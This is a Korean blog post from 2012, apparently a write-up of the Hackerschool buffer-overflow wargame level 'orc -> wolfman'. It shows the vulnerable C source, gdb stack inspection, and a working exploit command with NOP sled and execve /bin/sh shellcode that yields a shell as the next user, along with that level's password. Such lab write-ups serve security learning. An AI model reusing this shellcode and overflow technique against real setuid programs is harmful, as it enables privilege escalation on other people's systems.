hackerschool bof 원정대 orc -> wolfman

2012. 1. 18. 15:42 from MyStudy/BOF원정대
LEVEL5 (orc -> wolfman) : egghunter + bufferhunter

orc를 물리칠때와 비슷하나 buffer도 없어지는것 같다. 코드를 확인해보자

[orc@localhost .izayoi]$ cat wolfman.c
#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // shellcode hunter
        memset(buffer, 0, 40);
}


orc문제와 비슷하게 구성되어있고 이번엔 buffer를 비우고 있다.
역시 아까 방법중에 argv[1]을 이용하면 될 것 같다.

 [orc@localhost .izayoi]$ ./wolfman `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[orc@localhost .izayoi]$ gdb -c core -q
Core was generated by `./wolfman ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/120x $esp
....
0xbffffc40:     0x38366900      0x2f2e0036      0x666c6f77      0x006e616d
0xbffffc50:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc60:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc70:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc80:     0x00000000      0x00000000      0x00000000      0x00000000
....
(gdb)

이제는 너무 익숙한것 같다.
[stack] [sfp]     [ret]      [argc] [argv] [env]
                   ^0xbffffc50              ^"\x90"x20+shellcode+0xbffffc50

 [orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x20,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","\x50\xfc\xff\xbf"'`
1ÀPh//shh/bin‰ãPS‰á™°
                     Í€Püÿ¿
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$ my-pass
euid = 505
love eyuna

[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x20,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80","\x42\xfc\xff\xbf"'`
1ÀPh//shh/bin‰ãPS‰á™°
                     Í€Büÿ¿
bash$

음 이번에도 위에서 core파일 dump뜬거에서 0xbffffc50이 첫번째 주소로 나와있었지만 실제 wolfman을 때려잡을 때는 0xbffffc42부터 nop썰매가 시작된다는 것을 알 수가 있다.
저작자표시

'MyStudy > BOF원정대' 카테고리의 다른 글

hackerschool bof 원정대 darkelf -> orge  (0) 2012.01.19
hackerschool bof 원정대 wolfman -> darkelf  (0) 2012.01.18
hackerschool bof 원정대 goblin -> orc  (0) 2012.01.18
hackerschool bof 원정대 cobolt -> goblin  (0) 2012.01.18
hackerschool bof 원정대 gremlin -> cobolt  (0) 2012.01.17
Posted by john@memory :

티스토리툴바